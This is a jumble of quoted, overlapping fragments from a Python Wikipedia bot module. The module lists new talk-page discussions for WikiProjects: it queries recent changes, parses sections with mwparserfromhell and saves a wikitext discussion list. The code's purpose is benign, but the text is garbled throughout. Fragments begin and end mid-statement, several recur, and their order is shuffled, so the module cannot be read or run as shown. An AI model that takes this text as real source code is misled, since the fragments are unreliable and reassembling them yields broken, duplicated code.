reports\") for project in self._bot.get_configured_projects():", "the dict are those that have been updated in the given time range.", "rc_bot = 0\"\"\" startts = start.strftime(\"%Y%m%d%H%M%S\") endts = end.strftime(\"%Y%m%d%H%M%S\") self._logger.info(\"Fetching discussions updated between", "from the API.\"\"\" def _get_rev(page): try: return page[\"revisions\"][0][\"slots\"][\"main\"][\"content\"] except (KeyError, IndexError): return \"\"", "query = \"\"\"SELECT DISTINCT rc_namespace, rc_title FROM recentchanges WHERE rc_timestamp >= ? AND", "discussions[:self.DISCUSSIONS_PER_PAGE] for disc in discussions: self._logger.debug(\" [[%s#%s]] at %s\", disc.title, disc.name, disc.timestamp.strftime(\"%Y %m", "= \"\\n\".join(discitems) projtalk = self._bot.get_page(project.name).toggleTalkPage().title() page = self._bot.get_page(title) page.text = text % {", "disc in discussions if disc.title not in current][:3] return discussions, news def _save_discussions(self,", "2|%(projtalk)s|View Other Discussions|class=mw-ui-block}} }} {{WPX list start|intro={{WPX last updated|%(title)s}}}} %(discussions)s {{WPX list end|more=%(title)s}}", "title, text in pages: try: sections[title] = self._extract_sections(text) except mwparserfromhell.parser.ParserError: self._logger.exception(\"Failed to parse", "the given timestamp string, or ValueError.\"\"\" return datetime.strptime(str(text), \"%H:%M, %d %B %Y (UTC)\")", "continue title = str(tmpl.get(\"title\").value) section = _Section(str(tmpl.get(\"section\").value), timestamp) if title in discussions: discussions[title].add(section)", "+ 1, page.title) if title in updated: sections[title] = updated[title] elif title in", "discussions if disc.title not in current][:3] return discussions, news def _save_discussions(self, project, title,", "_save_discussions(self, project, title, discussions, news): \"\"\"Save the given list of discussions to the", "= self._bot.get_page(project.name).toggleTalkPage().title() page = self._bot.get_page(title) page.text = text % { \"title\": title, \"projname\":", "{{WPX action box|color={{{2|#086}}}|title=Have a question?|content= {{Clickable button 2|url={{fullurl:%(projtalk)s|action=edit&section=new}}|Ask the WikiProject|class=mw-ui-progressive mw-ui-block}} {{Clickable button", "{{WPX list end|more=%(title)s}} \"\"\" template = \"{{WPX new discussion|color={{{1|#37f}}}|title=%(title)s|section=%(name)s|timestamp=%(timestamp)s}}\" discitems = [ template", "discussions, news) def run(self): start = self._bot.get_last_updated(\"new_discussions\") end = datetime.utcnow() updated = self._get_updated_discussions(start,", "sections.add(_Section(name, timestamp)) return sections def _load_pages(self, titles): \"\"\"Load a chunk of pages from", "= {} chunksize = 50 for start in range(0, len(titles), chunksize): chunk =", "text in pages: try: sections[title] = self._extract_sections(text) except mwparserfromhell.parser.ParserError: self._logger.exception(\"Failed to parse [[%s]]\",", "most recent discussion tuples.\"\"\" sections = {} for page in pages: title =", "minor=False) def _process(self, project, updated): \"\"\"Process new discussions for the given project.\"\"\" self._logger.debug(\"Updating", "start in range(0, len(titles), chunksize): chunk = titles[start:start+chunksize] pages = self._load_pages(chunk) for title,", "{} for tmpl in code.filter_templates(): if tmpl.name != self.DISCUSSION_TEMPLATE: continue if not (tmpl.has(\"title\")", "section tuples. Given a WikiProject new discussions page, return all discussions currently listed.", "a dict mapping talk page titles to lists of section tuples. Given a", "in sections[title]] discussions.sort(key=lambda disc: disc.timestamp, reverse=True) discussions = discussions[:self.DISCUSSIONS_PER_PAGE] for disc in discussions:", "2|url={{fullurl:%(projtalk)s|action=edit&section=new}}|Ask the WikiProject|class=mw-ui-progressive mw-ui-block}} {{Clickable button 2|%(projtalk)s|View Other Discussions|class=mw-ui-block}} }} {{WPX list start|intro={{WPX", "tuples for the given page.\"\"\" code = mwparserfromhell.parse(text) sections = set() for section", "mw-ui-block}} {{Clickable button 2|%(projtalk)s|View Other Discussions|class=mw-ui-block}} }} {{WPX list start|intro={{WPX last updated|%(title)s}}}} %(discussions)s", "for item in news) page.save(summary, minor=False) def _process(self, project, updated): \"\"\"Process new discussions", "from reportsbot.task import Task from reportsbot.util import join_full_title import mwparserfromhell from pywikibot.data.api import", "list of new discussions within a WikiProject's scope.\"\"\" DISCUSSION_TEMPLATE = \"WPX new discussion\"", "= _Section(str(tmpl.get(\"section\").value), timestamp) if title in discussions: discussions[title].add(section) else: discussions[title] = {section} return", "def _process(self, project, updated): \"\"\"Process new discussions for the given project.\"\"\" self._logger.debug(\"Updating new", "in sections for section in sections[title]] discussions.sort(key=lambda disc: disc.timestamp, reverse=True) discussions = discussions[:self.DISCUSSIONS_PER_PAGE]", "rc_namespace, rc_title FROM recentchanges WHERE rc_timestamp >= ? AND rc_timestamp < ? AND", "OR rc_type = 3) AND rc_bot = 0\"\"\" startts = start.strftime(\"%Y%m%d%H%M%S\") endts =", "data[\"query\"][\"pages\"]] def _get_updated_discussions(self, start, end): \"\"\"Return a dict mapping talk page titles to", "\"\"\"Return a sorted list of the most recent discussion tuples.\"\"\" sections = {}", "project, title, discussions, news): \"\"\"Save the given list of discussions to the given", "title, \"projname\": project.name, \"projtalk\": projtalk, \"discussions\": disclist } summary = \"Updating new discussions\"", "req.submit() return [(page[\"title\"], _get_rev(page)) for page in data[\"query\"][\"pages\"]] def _get_updated_discussions(self, start, end): \"\"\"Return", "ValueError: continue name = str(section.get(0).title.strip_code()).strip() sections.add(_Section(name, timestamp)) return sections def _load_pages(self, titles): \"\"\"Load", "section tuples for the given page.\"\"\" code = mwparserfromhell.parse(text) sections = set() for", "lists of section tuples. The only pages included in the dict are those", "in code.filter_templates(): if tmpl.name != self.DISCUSSION_TEMPLATE: continue if not (tmpl.has(\"title\") and tmpl.has(\"section\") and", "self._logger.info(\"Updating discussion reports\") for project in self._bot.get_configured_projects(): if project.config.get(\"new_discussions\"): self._process(project, updated) self._bot.set_last_updated(\"new_discussions\", end)", "the given page.\"\"\" code = mwparserfromhell.parse(text) sections = set() for section in code.get_sections(levels=[2]):", "__all__ = [\"NewDiscussions\"] _Section = namedtuple(\"_Section\", [\"name\", \"timestamp\"]) _Discussion = namedtuple(\"_Discussion\", [\"title\", \"name\",", "sections[title] = self._extract_sections(text) except mwparserfromhell.parser.ParserError: self._logger.exception(\"Failed to parse [[%s]]\", title) return sections def", ">= ? AND rc_timestamp < ? AND rc_namespace % 2 = 1 AND", "-*- \"\"\" New Discussions -- Provides a list of new discussions within a", "re from reportsbot.task import Task from reportsbot.util import join_full_title import mwparserfromhell from pywikibot.data.api", "= Request(self._bot.site, parameters={ \"action\": \"query\", \"prop\": \"revisions\", \"rvprop\": \"content\", \"rvslots\": \"main\", \"formatversion\": \"2\",", "the given list of discussions to the given page title.\"\"\" text = \"\"\"<noinclude><div", "a list of new discussions within a WikiProject's scope Copyright (C) 2015 <NAME>,", "new discussion|color={{{1|#37f}}}|title=%(title)s|section=%(name)s|timestamp=%(timestamp)s}}\" discitems = [ template % { \"title\": disc.title, \"name\": disc.name, \"timestamp\":", "def _load_pages(self, titles): \"\"\"Load a chunk of pages from the API.\"\"\" def _get_rev(page):", "\"\\n\".join(discitems[fold:]) disclist = before + \"<noinclude>\\n\" + after + \"</noinclude>\" else: disclist =", "section = _Section(str(tmpl.get(\"section\").value), timestamp) if title in discussions: discussions[title].add(section) else: discussions[title] = {section}", "summary = \"Updating new discussions\" if news: summary += \": \" + \",", "len(titles), chunksize): chunk = titles[start:start+chunksize] pages = self._load_pages(chunk) for title, text in pages:", "title in sections for section in sections[title]] discussions.sort(key=lambda disc: disc.timestamp, reverse=True) discussions =", "range(0, len(titles), chunksize): chunk = titles[start:start+chunksize] pages = self._load_pages(chunk) for title, text in", "new discussions for %s\", project.name) title = project.name + \"/Discussions\" pages = project.get_members()", "section in sections[title]] discussions.sort(key=lambda disc: disc.timestamp, reverse=True) discussions = discussions[:self.DISCUSSIONS_PER_PAGE] for disc in", "return discussions def _process_discussions(self, pages, current, updated): \"\"\"Return a sorted list of the", "AND rc_namespace != 3 AND (rc_type = 0 OR rc_type = 1 OR", "new discussions\" if news: summary += \": \" + \", \".join(\"[[%s]]\" % item", "= self._bot.get_last_updated(\"new_discussions\") end = datetime.utcnow() updated = self._get_updated_discussions(start, end) self._logger.info(\"Updating discussion reports\") for", "self._parse_timestamp(tmpl.get(\"timestamp\").value) except ValueError: continue title = str(tmpl.get(\"title\").value) section = _Section(str(tmpl.get(\"section\").value), timestamp) if title", "\"\"\"Process new discussions for the given project.\"\"\" self._logger.debug(\"Updating new discussions for %s\", project.name)", "1, page.title) if title in updated: sections[title] = updated[title] elif title in current:", "= \"WPX new discussion\" DISCUSSIONS_PER_PAGE = 15 DISCUSSIONS_BEFORE_FOLD = 4 @staticmethod def _parse_timestamp(text):", "section tuples. The only pages included in the dict are those that have", "new discussions page, return all discussions currently listed. \"\"\" text = self._bot.get_page(title).text code", "last updated|%(title)s}}}} %(discussions)s {{WPX list end|more=%(title)s}} \"\"\" template = \"{{WPX new discussion|color={{{1|#37f}}}|title=%(title)s|section=%(name)s|timestamp=%(timestamp)s}}\" discitems", "2016 <NAME> Licensed under MIT License: http://mitlicense.org \"\"\" from collections import namedtuple from", "recent discussion tuples.\"\"\" sections = {} for page in pages: title = join_full_title(self._bot.site,", "item for item in news) page.save(summary, minor=False) def _process(self, project, updated): \"\"\"Process new", "re.search(r\"\\d\\d:\\d\\d,\\s\\d\\d?\\s\\w+\\s\\d{4}\\s\\(UTC\\)\", clean) if not match: continue try: timestamp = self._parse_timestamp(match.group(0)) except ValueError: continue", "\"\"\" query = \"\"\"SELECT DISTINCT rc_namespace, rc_title FROM recentchanges WHERE rc_timestamp >= ?", "fold: before = \"\\n\".join(discitems[:fold]) after = \"\\n\".join(discitems[fold:]) disclist = before + \"<noinclude>\\n\" +", "for %s\", project.name) title = project.name + \"/Discussions\" pages = project.get_members() current =", "+ \"<noinclude>\\n\" + after + \"</noinclude>\" else: disclist = \"\\n\".join(discitems) projtalk = self._bot.get_page(project.name).toggleTalkPage().title()", "parse [[%s]]\", title) return sections def _get_current_discussions(self, title): \"\"\"Return a dict mapping talk", "given page.\"\"\" code = mwparserfromhell.parse(text) sections = set() for section in code.get_sections(levels=[2]): clean", "coding: utf-8 -*- \"\"\" New Discussions -- Provides a list of new discussions", "end|more=%(title)s}} \"\"\" template = \"{{WPX new discussion|color={{{1|#37f}}}|title=%(title)s|section=%(name)s|timestamp=%(timestamp)s}}\" discitems = [ template % {", "to lists of section tuples. The only pages included in the dict are", "}) data = req.submit() return [(page[\"title\"], _get_rev(page)) for page in data[\"query\"][\"pages\"]] def _get_updated_discussions(self,", "return sections def _get_current_discussions(self, title): \"\"\"Return a dict mapping talk page titles to", "def _save_discussions(self, project, title, discussions, news): \"\"\"Save the given list of discussions to", "timestamp)) return sections def _load_pages(self, titles): \"\"\"Load a chunk of pages from the", "for the given page.\"\"\" code = mwparserfromhell.parse(text) sections = set() for section in", "to WikiProject|class=mw-ui-neutral}}</div></noinclude> {{WPX action box|color={{{2|#086}}}|title=Have a question?|content= {{Clickable button 2|url={{fullurl:%(projtalk)s|action=edit&section=new}}|Ask the WikiProject|class=mw-ui-progressive mw-ui-block}}", "def _get_current_discussions(self, title): \"\"\"Return a dict mapping talk page titles to lists of", "self._logger.debug(\"Fetching sections for %s pages\", len(titles)) sections = {} chunksize = 50 for", "discussions, news = self._process_discussions(pages, current, updated) self._save_discussions(project, title, discussions, news) def run(self): start", "are those that have been updated in the given time range. \"\"\" query", "end): \"\"\"Return a dict mapping talk page titles to lists of section tuples.", "endts = end.strftime(\"%Y%m%d%H%M%S\") self._logger.info(\"Fetching discussions updated between %s and %s\", startts, endts) with", "a WikiProject's scope.\"\"\" DISCUSSION_TEMPLATE = \"WPX new discussion\" DISCUSSIONS_PER_PAGE = 15 DISCUSSIONS_BEFORE_FOLD =", "section.name, section.timestamp) for title in sections for section in sections[title]] discussions.sort(key=lambda disc: disc.timestamp,", "DISCUSSIONS_BEFORE_FOLD = 4 @staticmethod def _parse_timestamp(text): \"\"\"Return a datetime for the given timestamp", "\"%H:%M, %d %B %Y (UTC)\") def _extract_sections(self, text): \"\"\"Return a list of section", "{} for page in pages: title = join_full_title(self._bot.site, page.ns + 1, page.title) if", "pages included in the dict are those that have been updated in the", "(tmpl.has(\"title\") and tmpl.has(\"section\") and tmpl.has(\"timestamp\")): continue try: timestamp = self._parse_timestamp(tmpl.get(\"timestamp\").value) except ValueError: continue", "not (tmpl.has(\"title\") and tmpl.has(\"section\") and tmpl.has(\"timestamp\")): continue try: timestamp = self._parse_timestamp(tmpl.get(\"timestamp\").value) except ValueError:", "run(self): start = self._bot.get_last_updated(\"new_discussions\") end = datetime.utcnow() updated = self._get_updated_discussions(start, end) self._logger.info(\"Updating discussion", "mwparserfromhell from pywikibot.data.api import Request __all__ = [\"NewDiscussions\"] _Section = namedtuple(\"_Section\", [\"name\", \"timestamp\"])", "\"<noinclude>\\n\" + after + \"</noinclude>\" else: disclist = \"\\n\".join(discitems) projtalk = self._bot.get_page(project.name).toggleTalkPage().title() page", "given timestamp string, or ValueError.\"\"\" return datetime.strptime(str(text), \"%H:%M, %d %B %Y (UTC)\") def", "Provides a list of new discussions within a WikiProject's scope Copyright (C) 2015", "discussions.sort(key=lambda disc: disc.timestamp, reverse=True) discussions = discussions[:self.DISCUSSIONS_PER_PAGE] for disc in discussions: self._logger.debug(\" [[%s#%s]]", "in news) page.save(summary, minor=False) def _process(self, project, updated): \"\"\"Process new discussions for the", "def _get_updated_discussions(self, start, end): \"\"\"Return a dict mapping talk page titles to lists", "\"revisions\", \"rvprop\": \"content\", \"rvslots\": \"main\", \"formatversion\": \"2\", \"titles\": \"|\".join(titles) }) data = req.submit()", "rc_timestamp < ? AND rc_namespace % 2 = 1 AND rc_namespace != 3", "@staticmethod def _parse_timestamp(text): \"\"\"Return a datetime for the given timestamp string, or ValueError.\"\"\"", "discussion\" DISCUSSIONS_PER_PAGE = 15 DISCUSSIONS_BEFORE_FOLD = 4 @staticmethod def _parse_timestamp(text): \"\"\"Return a datetime", "sections = set() for section in code.get_sections(levels=[2]): clean = section.strip_code() match = re.search(r\"\\d\\d:\\d\\d,\\s\\d\\d?\\s\\w+\\s\\d{4}\\s\\(UTC\\)\",", "req = Request(self._bot.site, parameters={ \"action\": \"query\", \"prop\": \"revisions\", \"rvprop\": \"content\", \"rvslots\": \"main\", \"formatversion\":", "if tmpl.name != self.DISCUSSION_TEMPLATE: continue if not (tmpl.has(\"title\") and tmpl.has(\"section\") and tmpl.has(\"timestamp\")): continue", "DISCUSSIONS_PER_PAGE = 15 DISCUSSIONS_BEFORE_FOLD = 4 @staticmethod def _parse_timestamp(text): \"\"\"Return a datetime for", "disc: disc.timestamp, reverse=True) discussions = discussions[:self.DISCUSSIONS_PER_PAGE] for disc in discussions: self._logger.debug(\" [[%s#%s]] at", "for disc in discussions] fold = self.DISCUSSIONS_BEFORE_FOLD if len(discitems) > fold: before =", "\"prop\": \"revisions\", \"rvprop\": \"content\", \"rvslots\": \"main\", \"formatversion\": \"2\", \"titles\": \"|\".join(titles) }) data =", "%d %B %Y (UTC)\") } for disc in discussions] fold = self.DISCUSSIONS_BEFORE_FOLD if", "\"\"\" template = \"{{WPX new discussion|color={{{1|#37f}}}|title=%(title)s|section=%(name)s|timestamp=%(timestamp)s}}\" discitems = [ template % { \"title\":", "= re.search(r\"\\d\\d:\\d\\d,\\s\\d\\d?\\s\\w+\\s\\d{4}\\s\\(UTC\\)\", clean) if not match: continue try: timestamp = self._parse_timestamp(match.group(0)) except ValueError:", "try: timestamp = self._parse_timestamp(tmpl.get(\"timestamp\").value) except ValueError: continue title = str(tmpl.get(\"title\").value) section = _Section(str(tmpl.get(\"section\").value),", "datetime import datetime import re from reportsbot.task import Task from reportsbot.util import join_full_title", "_get_updated_discussions(self, start, end): \"\"\"Return a dict mapping talk page titles to lists of", "self.DISCUSSION_TEMPLATE: continue if not (tmpl.has(\"title\") and tmpl.has(\"section\") and tmpl.has(\"timestamp\")): continue try: timestamp =", "continue try: timestamp = self._parse_timestamp(match.group(0)) except ValueError: continue name = str(section.get(0).title.strip_code()).strip() sections.add(_Section(name, timestamp))", "in current: sections[title] = current[title] discussions = [_Discussion(title, section.name, section.timestamp) for title in", "current, updated): \"\"\"Return a sorted list of the most recent discussion tuples.\"\"\" sections", "\"timestamp\"]) class NewDiscussions(Task): \"\"\"Updates a list of new discussions within a WikiProject's scope.\"\"\"", "before = \"\\n\".join(discitems[:fold]) after = \"\\n\".join(discitems[fold:]) disclist = before + \"<noinclude>\\n\" + after", "after = \"\\n\".join(discitems[fold:]) disclist = before + \"<noinclude>\\n\" + after + \"</noinclude>\" else:", "been updated in the given time range. \"\"\" query = \"\"\"SELECT DISTINCT rc_namespace,", "set() for section in code.get_sections(levels=[2]): clean = section.strip_code() match = re.search(r\"\\d\\d:\\d\\d,\\s\\d\\d?\\s\\w+\\s\\d{4}\\s\\(UTC\\)\", clean) if", "in discussions] fold = self.DISCUSSIONS_BEFORE_FOLD if len(discitems) > fold: before = \"\\n\".join(discitems[:fold]) after", "updated) self._save_discussions(project, title, discussions, news) def run(self): start = self._bot.get_last_updated(\"new_discussions\") end = datetime.utcnow()", "for (ns, title) in cursor.fetchall()] self._logger.debug(\"Fetching sections for %s pages\", len(titles)) sections =", "in discussions if disc.title not in current][:3] return discussions, news def _save_discussions(self, project,", "mapping talk page titles to lists of section tuples. Given a WikiProject new", "\"discussions\": disclist } summary = \"Updating new discussions\" if news: summary += \":", "pages: try: sections[title] = self._extract_sections(text) except mwparserfromhell.parser.ParserError: self._logger.exception(\"Failed to parse [[%s]]\", title) return", "page.ns + 1, page.title) if title in updated: sections[title] = updated[title] elif title", "end = datetime.utcnow() updated = self._get_updated_discussions(start, end) self._logger.info(\"Updating discussion reports\") for project in", "Copyright (C) 2015 <NAME>, 2016 <NAME> Licensed under MIT License: http://mitlicense.org \"\"\" from", "self._bot.get_page(title) page.text = text % { \"title\": title, \"projname\": project.name, \"projtalk\": projtalk, \"discussions\":", "of pages from the API.\"\"\" def _get_rev(page): try: return page[\"revisions\"][0][\"slots\"][\"main\"][\"content\"] except (KeyError, IndexError):", "that have been updated in the given time range. \"\"\" query = \"\"\"SELECT", "= 1 OR rc_type = 3) AND rc_bot = 0\"\"\" startts = start.strftime(\"%Y%m%d%H%M%S\")", "rc_timestamp >= ? AND rc_timestamp < ? AND rc_namespace % 2 = 1", "self._bot.get_page(project.name).toggleTalkPage().title() page = self._bot.get_page(title) page.text = text % { \"title\": title, \"projname\": project.name,", "from reportsbot.util import join_full_title import mwparserfromhell from pywikibot.data.api import Request __all__ = [\"NewDiscussions\"]", "= mwparserfromhell.parse(text) sections = set() for section in code.get_sections(levels=[2]): clean = section.strip_code() match", "self._extract_sections(text) except mwparserfromhell.parser.ParserError: self._logger.exception(\"Failed to parse [[%s]]\", title) return sections def _get_current_discussions(self, title):", "timestamp = self._parse_timestamp(tmpl.get(\"timestamp\").value) except ValueError: continue title = str(tmpl.get(\"title\").value) section = _Section(str(tmpl.get(\"section\").value), timestamp)", "!= 3 AND (rc_type = 0 OR rc_type = 1 OR rc_type =", "code = mwparserfromhell.parse(text) sections = set() for section in code.get_sections(levels=[2]): clean = section.strip_code()", "AND rc_namespace % 2 = 1 AND rc_namespace != 3 AND (rc_type =", "ValueError.\"\"\" return datetime.strptime(str(text), \"%H:%M, %d %B %Y (UTC)\") def _extract_sections(self, text): \"\"\"Return a", "sections[title]] discussions.sort(key=lambda disc: disc.timestamp, reverse=True) discussions = discussions[:self.DISCUSSIONS_PER_PAGE] for disc in discussions: self._logger.debug(\"", "} for disc in discussions] fold = self.DISCUSSIONS_BEFORE_FOLD if len(discitems) > fold: before", "\"\"\" from collections import namedtuple from datetime import datetime import re from reportsbot.task", "def _extract_sections(self, text): \"\"\"Return a list of section tuples for the given page.\"\"\"", "= namedtuple(\"_Discussion\", [\"title\", \"name\", \"timestamp\"]) class NewDiscussions(Task): \"\"\"Updates a list of new discussions", "utf-8 -*- \"\"\" New Discussions -- Provides a list of new discussions within", "Request(self._bot.site, parameters={ \"action\": \"query\", \"prop\": \"revisions\", \"rvprop\": \"content\", \"rvslots\": \"main\", \"formatversion\": \"2\", \"titles\":", "for tmpl in code.filter_templates(): if tmpl.name != self.DISCUSSION_TEMPLATE: continue if not (tmpl.has(\"title\") and", "if not (tmpl.has(\"title\") and tmpl.has(\"section\") and tmpl.has(\"timestamp\")): continue try: timestamp = self._parse_timestamp(tmpl.get(\"timestamp\").value) except", "\"\"\"Save the given list of discussions to the given page title.\"\"\" text =", "the given project.\"\"\" self._logger.debug(\"Updating new discussions for %s\", project.name) title = project.name +", "self._logger.exception(\"Failed to parse [[%s]]\", title) return sections def _get_current_discussions(self, title): \"\"\"Return a dict", "= self._extract_sections(text) except mwparserfromhell.parser.ParserError: self._logger.exception(\"Failed to parse [[%s]]\", title) return sections def _get_current_discussions(self,", "text = self._bot.get_page(title).text code = mwparserfromhell.parse(text) discussions = {} for tmpl in code.filter_templates():", "fold = self.DISCUSSIONS_BEFORE_FOLD if len(discitems) > fold: before = \"\\n\".join(discitems[:fold]) after = \"\\n\".join(discitems[fold:])", "end.strftime(\"%Y%m%d%H%M%S\") self._logger.info(\"Fetching discussions updated between %s and %s\", startts, endts) with self._bot.wikidb as", "= namedtuple(\"_Section\", [\"name\", \"timestamp\"]) _Discussion = namedtuple(\"_Discussion\", [\"title\", \"name\", \"timestamp\"]) class NewDiscussions(Task): \"\"\"Updates", "currently listed. \"\"\" text = self._bot.get_page(title).text code = mwparserfromhell.parse(text) discussions = {} for", "discussions[title].add(section) else: discussions[title] = {section} return discussions def _process_discussions(self, pages, current, updated): \"\"\"Return", "= [_Discussion(title, section.name, section.timestamp) for title in sections for section in sections[title]] discussions.sort(key=lambda", "WikiProject new discussions page, return all discussions currently listed. \"\"\" text = self._bot.get_page(title).text", "titles to lists of section tuples. Given a WikiProject new discussions page, return", "= str(tmpl.get(\"title\").value) section = _Section(str(tmpl.get(\"section\").value), timestamp) if title in discussions: discussions[title].add(section) else: discussions[title]", "return sections def _load_pages(self, titles): \"\"\"Load a chunk of pages from the API.\"\"\"", "Discussions -- Provides a list of new discussions within a WikiProject's scope Copyright", "or ValueError.\"\"\" return datetime.strptime(str(text), \"%H:%M, %d %B %Y (UTC)\") def _extract_sections(self, text): \"\"\"Return", "= \"{{WPX new discussion|color={{{1|#37f}}}|title=%(title)s|section=%(name)s|timestamp=%(timestamp)s}}\" discitems = [ template % { \"title\": disc.title, \"name\":", "pages, current, updated): \"\"\"Return a sorted list of the most recent discussion tuples.\"\"\"", "%s and %s\", startts, endts) with self._bot.wikidb as cursor: cursor.execute(query, (startts, endts)) titles", "the given page title.\"\"\" text = \"\"\"<noinclude><div style=\"padding-bottom:1em;\">{{Clickable button 2|%(projname)s|Return to WikiProject|class=mw-ui-neutral}}</div></noinclude> {{WPX", "discussions\" if news: summary += \": \" + \", \".join(\"[[%s]]\" % item for", "else: discussions[title] = {section} return discussions def _process_discussions(self, pages, current, updated): \"\"\"Return a", "to parse [[%s]]\", title) return sections def _get_current_discussions(self, title): \"\"\"Return a dict mapping", "\"content\", \"rvslots\": \"main\", \"formatversion\": \"2\", \"titles\": \"|\".join(titles) }) data = req.submit() return [(page[\"title\"],", "(KeyError, IndexError): return \"\" req = Request(self._bot.site, parameters={ \"action\": \"query\", \"prop\": \"revisions\", \"rvprop\":", "_process_discussions(self, pages, current, updated): \"\"\"Return a sorted list of the most recent discussion", "text % { \"title\": title, \"projname\": project.name, \"projtalk\": projtalk, \"discussions\": disclist } summary", "datetime.strptime(str(text), \"%H:%M, %d %B %Y (UTC)\") def _extract_sections(self, text): \"\"\"Return a list of", "title) return sections def _get_current_discussions(self, title): \"\"\"Return a dict mapping talk page titles", "given page title.\"\"\" text = \"\"\"<noinclude><div style=\"padding-bottom:1em;\">{{Clickable button 2|%(projname)s|Return to WikiProject|class=mw-ui-neutral}}</div></noinclude> {{WPX action", "def _parse_timestamp(text): \"\"\"Return a datetime for the given timestamp string, or ValueError.\"\"\" return", "MIT License: http://mitlicense.org \"\"\" from collections import namedtuple from datetime import datetime import", "(C) 2015 <NAME>, 2016 <NAME> Licensed under MIT License: http://mitlicense.org \"\"\" from collections", "end) self._logger.info(\"Updating discussion reports\") for project in self._bot.get_configured_projects(): if project.config.get(\"new_discussions\"): self._process(project, updated) self._bot.set_last_updated(\"new_discussions\",", "page titles to lists of section tuples. The only pages included in the", "from pywikibot.data.api import Request __all__ = [\"NewDiscussions\"] _Section = namedtuple(\"_Section\", [\"name\", \"timestamp\"]) _Discussion", "current][:3] return discussions, news def _save_discussions(self, project, title, discussions, news): \"\"\"Save the given", "updated in the given time range. \"\"\" query = \"\"\"SELECT DISTINCT rc_namespace, rc_title", "and %s\", startts, endts) with self._bot.wikidb as cursor: cursor.execute(query, (startts, endts)) titles =", "discussions for %s\", project.name) title = project.name + \"/Discussions\" pages = project.get_members() current", "a list of new discussions within a WikiProject's scope.\"\"\" DISCUSSION_TEMPLATE = \"WPX new", "title, discussions, news) def run(self): start = self._bot.get_last_updated(\"new_discussions\") end = datetime.utcnow() updated =", "dict are those that have been updated in the given time range. \"\"\"", "updated): \"\"\"Return a sorted list of the most recent discussion tuples.\"\"\" sections =", "= \"\"\"SELECT DISTINCT rc_namespace, rc_title FROM recentchanges WHERE rc_timestamp >= ? AND rc_timestamp", "AND rc_bot = 0\"\"\" startts = start.strftime(\"%Y%m%d%H%M%S\") endts = end.strftime(\"%Y%m%d%H%M%S\") self._logger.info(\"Fetching discussions updated", "2|%(projname)s|Return to WikiProject|class=mw-ui-neutral}}</div></noinclude> {{WPX action box|color={{{2|#086}}}|title=Have a question?|content= {{Clickable button 2|url={{fullurl:%(projtalk)s|action=edit&section=new}}|Ask the WikiProject|class=mw-ui-progressive", "\": \" + \", \".join(\"[[%s]]\" % item for item in news) page.save(summary, minor=False)", "title = str(tmpl.get(\"title\").value) section = _Section(str(tmpl.get(\"section\").value), timestamp) if title in discussions: discussions[title].add(section) else:", "clean = section.strip_code() match = re.search(r\"\\d\\d:\\d\\d,\\s\\d\\d?\\s\\w+\\s\\d{4}\\s\\(UTC\\)\", clean) if not match: continue try: timestamp", "action box|color={{{2|#086}}}|title=Have a question?|content= {{Clickable button 2|url={{fullurl:%(projtalk)s|action=edit&section=new}}|Ask the WikiProject|class=mw-ui-progressive mw-ui-block}} {{Clickable button 2|%(projtalk)s|View", "disc in discussions: self._logger.debug(\" [[%s#%s]] at %s\", disc.title, disc.name, disc.timestamp.strftime(\"%Y %m %d, %H:%M:%S\"))", "tmpl in code.filter_templates(): if tmpl.name != self.DISCUSSION_TEMPLATE: continue if not (tmpl.has(\"title\") and tmpl.has(\"section\")", "disc.title, \"name\": disc.name, \"timestamp\": disc.timestamp.strftime(\"%H:%M, %d %B %Y (UTC)\") } for disc in", "titles): \"\"\"Load a chunk of pages from the API.\"\"\" def _get_rev(page): try: return", "a question?|content= {{Clickable button 2|url={{fullurl:%(projtalk)s|action=edit&section=new}}|Ask the WikiProject|class=mw-ui-progressive mw-ui-block}} {{Clickable button 2|%(projtalk)s|View Other Discussions|class=mw-ui-block}}", "string, or ValueError.\"\"\" return datetime.strptime(str(text), \"%H:%M, %d %B %Y (UTC)\") def _extract_sections(self, text):", "dict mapping talk page titles to lists of section tuples. Given a WikiProject", "}} {{WPX list start|intro={{WPX last updated|%(title)s}}}} %(discussions)s {{WPX list end|more=%(title)s}} \"\"\" template =", "titles to lists of section tuples. The only pages included in the dict", "with self._bot.wikidb as cursor: cursor.execute(query, (startts, endts)) titles = [join_full_title(self._bot.site, ns, title.decode(\"utf8\")) for", "for title, text in pages: try: sections[title] = self._extract_sections(text) except mwparserfromhell.parser.ParserError: self._logger.exception(\"Failed to", "title.decode(\"utf8\")) for (ns, title) in cursor.fetchall()] self._logger.debug(\"Fetching sections for %s pages\", len(titles)) sections", "if title in discussions: discussions[title].add(section) else: discussions[title] = {section} return discussions def _process_discussions(self,", "\"timestamp\": disc.timestamp.strftime(\"%H:%M, %d %B %Y (UTC)\") } for disc in discussions] fold =", "those that have been updated in the given time range. \"\"\" query =", "\"\"\" New Discussions -- Provides a list of new discussions within a WikiProject's", "return discussions, news def _save_discussions(self, project, title, discussions, news): \"\"\"Save the given list", "disc.timestamp.strftime(\"%H:%M, %d %B %Y (UTC)\") } for disc in discussions] fold = self.DISCUSSIONS_BEFORE_FOLD", "= set() for section in code.get_sections(levels=[2]): clean = section.strip_code() match = re.search(r\"\\d\\d:\\d\\d,\\s\\d\\d?\\s\\w+\\s\\d{4}\\s\\(UTC\\)\", clean)", "= self._parse_timestamp(match.group(0)) except ValueError: continue name = str(section.get(0).title.strip_code()).strip() sections.add(_Section(name, timestamp)) return sections def", "sections def _load_pages(self, titles): \"\"\"Load a chunk of pages from the API.\"\"\" def", "project.name) title = project.name + \"/Discussions\" pages = project.get_members() current = self._get_current_discussions(title) discussions,", "startts, endts) with self._bot.wikidb as cursor: cursor.execute(query, (startts, endts)) titles = [join_full_title(self._bot.site, ns,", "\"/Discussions\" pages = project.get_members() current = self._get_current_discussions(title) discussions, news = self._process_discussions(pages, current, updated)", "= self._get_current_discussions(title) discussions, news = self._process_discussions(pages, current, updated) self._save_discussions(project, title, discussions, news) def", "= join_full_title(self._bot.site, page.ns + 1, page.title) if title in updated: sections[title] = updated[title]", "a WikiProject's scope Copyright (C) 2015 <NAME>, 2016 <NAME> Licensed under MIT License:", "<NAME> Licensed under MIT License: http://mitlicense.org \"\"\" from collections import namedtuple from datetime", "within a WikiProject's scope.\"\"\" DISCUSSION_TEMPLATE = \"WPX new discussion\" DISCUSSIONS_PER_PAGE = 15 DISCUSSIONS_BEFORE_FOLD", "return page[\"revisions\"][0][\"slots\"][\"main\"][\"content\"] except (KeyError, IndexError): return \"\" req = Request(self._bot.site, parameters={ \"action\": \"query\",", "new discussion\" DISCUSSIONS_PER_PAGE = 15 DISCUSSIONS_BEFORE_FOLD 